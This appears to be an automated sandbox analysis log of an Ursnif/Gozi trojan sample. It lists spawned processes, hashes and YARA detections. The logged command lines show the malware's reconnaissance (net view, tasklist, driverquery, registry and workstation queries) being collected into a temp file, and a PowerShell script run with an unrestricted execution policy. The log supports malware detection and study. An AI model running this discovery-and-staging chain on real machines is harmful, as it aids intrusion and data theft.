Analysis Process: cmd.exePID: 3540, Parent PID: 3528

General

Target ID:	34
Start time:	15:03:59
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5832, Parent PID: 3528

General

Target ID:	35
Start time:	15:03:59
Start date:	11/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: conhost.exePID: 5004, Parent PID: 3540

General

Target ID:	36
Start time:	15:04:09
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 1020, Parent PID: 3528

General

Target ID:	37
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2972, Parent PID: 5832

General

Target ID:	38
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 1948, Parent PID: 1020

General

Target ID:	39
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: net.exePID: 4120, Parent PID: 1020

General

Target ID:	40
Start time:	15:04:12
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 1920, Parent PID: 3528

General

Target ID:	41
Start time:	15:04:22
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: conhost.exePID: 5300, Parent PID: 1920

General

Target ID:	42
Start time:	15:04:23
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 2756, Parent PID: 3528

General

Target ID:	43
Start time:	15:04:25
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff756d70000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6012, Parent PID: 2756

General

Target ID:	44
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exePID: 6064, Parent PID: 1920

General

Target ID:	45
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Imagebase:	0x7ff635980000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 5240, Parent PID: 3528

General

Target ID:	46
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5232, Parent PID: 6064

General

Target ID:	47
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6060, Parent PID: 5240

General

Target ID:	48
Start time:	15:04:27
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: nslookup.exePID: 5652, Parent PID: 5240

General

Target ID:	49
Start time:	15:04:27
Start date:	11/10/2022
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup 127.0.0.1
Imagebase:	0x7ff7816b0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5444, Parent PID: 3528

General

Target ID:	50
Start time:	15:04:28
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4108, Parent PID: 5444

General

Target ID:	51
Start time:	15:04:28
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4680, Parent PID: 3528

General

Target ID:	52
Start time:	15:04:29
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2692, Parent PID: 4680

General

Target ID:	53
Start time:	15:04:30
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exePID: 3064, Parent PID: 4680

General

Target ID:	54
Start time:	15:04:30
Start date:	11/10/2022
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist.exe /SVC
Imagebase:	0x7ff791330000
File size:	100352 bytes
MD5 hash:	B12E0F9C42075B4B7AD01D0B6A48485D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 3664, Parent PID: 3528

General

Target ID:	55
Start time:	15:04:36
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4564, Parent PID: 3664

General

Target ID:	56
Start time:	15:04:36
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4708, Parent PID: 3528

General

Target ID:	57
Start time:	15:04:39
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2760, Parent PID: 4708

General

Target ID:	58
Start time:	15:04:41
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: driverquery.exePID: 5316, Parent PID: 4708

General

Target ID:	59
Start time:	15:04:41
Start date:	11/10/2022
Path:	C:\Windows\System32\driverquery.exe
Wow64 process (32bit):	false
Commandline:	driverquery.exe
Imagebase:	0x7ff6139f0000
File size:	81920 bytes
MD5 hash:	52ED960E5C82035A6FD2E3E52F8732A3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 1028, Parent PID: 3528

General

Target ID:	60
Start time:	15:04:48
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0xe10000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2432, Parent PID: 1028

General

Target ID:	61
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: csc.exePID: 5836, Parent PID: 6064

General

Target ID:	62
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 2736, Parent PID: 3528

General

Target ID:	63
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4384, Parent PID: 2736

General

Target ID:	64
Start time:	15:04:50
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: reg.exePID: 4492, Parent PID: 2736

General

Target ID:	65
Start time:	15:04:50
Start date:	11/10/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Imagebase:	0x7ff7f7c60000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5176, Parent PID: 3528

General

Target ID:	66
Start time:	15:04:53
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cvtres.exePID: 1716, Parent PID: 5836

General

Target ID:	67
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: conhost.exePID: 5024, Parent PID: 5176

General

Target ID:	68
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 1316, Parent PID: 3528

General

Target ID:	69
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 1240, Parent PID: 1316

General

Target ID:	70
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: net.exePID: 5880, Parent PID: 1316

General

Target ID:	71
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net config workstation
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

